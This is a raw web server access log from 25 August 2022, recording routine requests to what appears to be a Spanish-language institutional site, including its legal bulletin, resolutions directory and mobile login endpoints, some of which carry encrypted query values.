172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [25/Aug/2022:07:19:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
173.252.107.3 - - [25/Aug/2022:07:19:34 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
201.245.192.253 - - [25/Aug/2022:07:19:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43797
201.245.192.253 - - [25/Aug/2022:07:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40501
172.22.2.4 - - [25/Aug/2022:07:18:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
172.22.2.4 - - [25/Aug/2022:07:19:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.102.56.157 - - [25/Aug/2022:07:20:27 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/1DzJkq95OVbQD4CxXRWEk2NOlArQ5L/MOMu9VraYr3Lx9Fm0e6svK&y=U2FsdGVkX1/GVCUcSGX5F18bdBepxuuadN2w3d7coi/q2p9oKiyRj+LbqwfWKcUF HTTP/1.1" 200 30
186.102.56.157 - - [25/Aug/2022:07:20:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18A6Z2PdUkuNJYxOebLdCut8Xx14ECzifOialvuHO6CYtIGkIxN9yjz09YliaqFCWjK+S6Zujce8Fmd6MZrNwBPe0P2Tj8U46w=&u=U2FsdGVkX1+TRfSwOoXnJP7q3MbDMMcntUs350NxICY4gn6ixGEFO0OWyVTi4Qj3&y=U2FsdGVkX1/GVCUcSGX5F18bdBepxuuadN2w3d7coi/q2p9oKiyRj+LbqwfWKcUF HTTP/1.1" 200 97
186.102.56.157 - - [25/Aug/2022:07:20:27 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/uE7TZdjVbDrsS1e1bJoc8TFZPmHr14UT/PFaw2JshXLBWzBmaH77CVgMtUOlKjJv/9tKzK9FH1tZ0ycE0T9AHa4tKMXcK1osPg8YE+E4Xpu5aKVkgvYv289aWvV1p+htc/f69TzEe0NNbL19R+qJbddnNzCNjlo6eZoDTrMyKBFZiah35UvdeqNnRlje7PDNBFdsdDjXktUIvSGJdjtULTdexCuOaTFLQ4Xd0sthkcGbUb4cBbx7RJKPk/gK1vV0Fx54GvMFIgLflxckzVP5CaQbQePaM3FOVVxDYUcFcUZQG6dfcnKvz27vIE7lzDFeqW621ODc897mCEIc0tFKZwiEiEtzZQDRLoUhF2Pf3jzk0x3ekZUV0o8dsuxDjGd0aLhVFZVguvNT6IIBKbI6nTKVMV9NtxYFUTZ5oM2uJywXKzE5bJt2L9wva5H15tPMvsVXUDnDuiPrxUVWO6EZ1i12ax/YscabF9UlEoPPTS2NcYePJy0TSAgRjacvYpXgzZiDp0Rb4CMZ6NRQ9wB6TVag7nLj3xtLDpJSobBGg5ZP+65SJhz/e08qZCcXSSPCeznZ2y0cTyvbOzfnPkd8nbR3bw7A6zN1IGbrWZBRzfLb67vzB6WZR/kguoEggTXNsqQMJXLxcsi1j1COXx7GysIMSopDJ6prvGLIsbpz98jYZYOyxl8iYP47mIGBoC7cV9n4j5zrqtJS2L7tHSWat86lN54/3AQ+P5/ut91sjSdpBgseqf2rHKlPLUWrzatyl4koc9VY1WkxtwwprWMV8D+LQh+INddeQxRid45CgUnl2gEBPrpRBHm4uPpTQcPg+T0KwhSwaQGJZoyFpW3JAXrz5+ctgg5/MonX0KsP9LFtUq5epJ9qaKE0QIgxjSTTlQ+b09RVffnVsCYCXoRV9nBbz0HcVafLWmZO2G3cFeggEPS7Ywhu7H4n+0KrwqU+t5yc+hq8fyw8UDsCF3aFD+jd+zzzhQb6Vyu4ElzTRUj+7CC53rU7c6K1uTngbscVnHAzB3nldL8UaPkGYMGffFJlmlxT2Oa2AF5UNiud0nXyE7EAjrdA/fPckqrLUvpMYVoWSvL5C51dHvuYA/wXgDgEnlWHAWPCIfuGsdAFbPZUaVKNTgFm9S1MqwX224gEogVfFHnrDghjDqG9mPob2ZK+rxe8od50cKWOwJy8y2CuLew3eEmM9ONCKVyTN98/0sJYlrlMwB+8TiMWXpLAatqA2bs97AN3s2oghPI/7v19SQhCgyjtUrFqoxUH1tQ+S8ko/46EE8mei4HcyX24uIlSGWWpLrwN35cyaKLOyGxt5Js7Qp9sJn0ZL0zItBsbHqyKu2guVE/9ICYfFfDh1Sovh5ytytnQ=&u=U2FsdGVkX1+TRfSwOoXnJP7q3MbDMMcntUs350NxICY4gn6ixGEFO0OWyVTi4Qj3&y=U2FsdGVkX1/GVCUcSGX5F18bdBepxuuadN2w3d7coi/q2p9oKiyRj+LbqwfWKcUF HTTP/1.1" 200 1565
186.102.56.157 - - [25/Aug/2022:07:20:28 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/z1Tu14wHsKP+X9e1CYZ6eP0G1gA5U8tajftz5bw1RBs7hV2EuMojJcgzIew3BgbXCY4nUZQQhY2x1MffJr5lY71g6m83aWuvQ7I5wnfVgqZP0sv0li3o4jl+dPGpjarQ7H8Dtf6kOrjc8vHgVrsBLWN4dZkbhqt+qmMVJMU/BjogVjIyAbciK5fb8MBd8bMngjloo54MgvqFF1I3Fe5y2yPHpZy5KPPtc1F/LWJJ6yLp45W/LZMSAN+I7AjG8QHqowvAJRZ+DbNFXNtdjDZH3pgqpKpJm+jo=&u=U2FsdGVkX1+TRfSwOoXnJP7q3MbDMMcntUs350NxICY4gn6ixGEFO0OWyVTi4Qj3&y=U2FsdGVkX1/GVCUcSGX5F18bdBepxuuadN2w3d7coi/q2p9oKiyRj+LbqwfWKcUF HTTP/1.1" 200 176
186.102.56.157 - - [25/Aug/2022:07:20:28 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/1DzJkq95OVbQD4CxXRWEk2NOlArQ5L/MOMu9VraYr3Lx9Fm0e6svK HTTP/1.1" 200 30992
186.82.177.20 - - [25/Aug/2022:07:20:43 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
186.82.177.20 - - [25/Aug/2022:07:20:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.82.177.20 - - [25/Aug/2022:07:20:48 -0500] "POST /appsia/controlador HTTP/1.1" 200 7783
186.82.177.20 - - [25/Aug/2022:07:20:49 -0500] "POST /appsia/controlador HTTP/1.1" 200 6644
190.156.70.119 - - [25/Aug/2022:07:20:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.156.70.119 - - [25/Aug/2022:07:20:52 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
190.156.70.119 - - [25/Aug/2022:07:20:52 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
190.156.70.119 - - [25/Aug/2022:07:20:52 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
190.156.70.119 - - [25/Aug/2022:07:20:52 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.82.177.20 - - [25/Aug/2022:07:20:54 -0500] "POST /appsia/controlador HTTP/1.1" 200 10602
190.156.70.119 - - [25/Aug/2022:07:20:54 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
190.156.70.119 - - [25/Aug/2022:07:20:54 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
190.156.70.119 - - [25/Aug/2022:07:20:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 219248
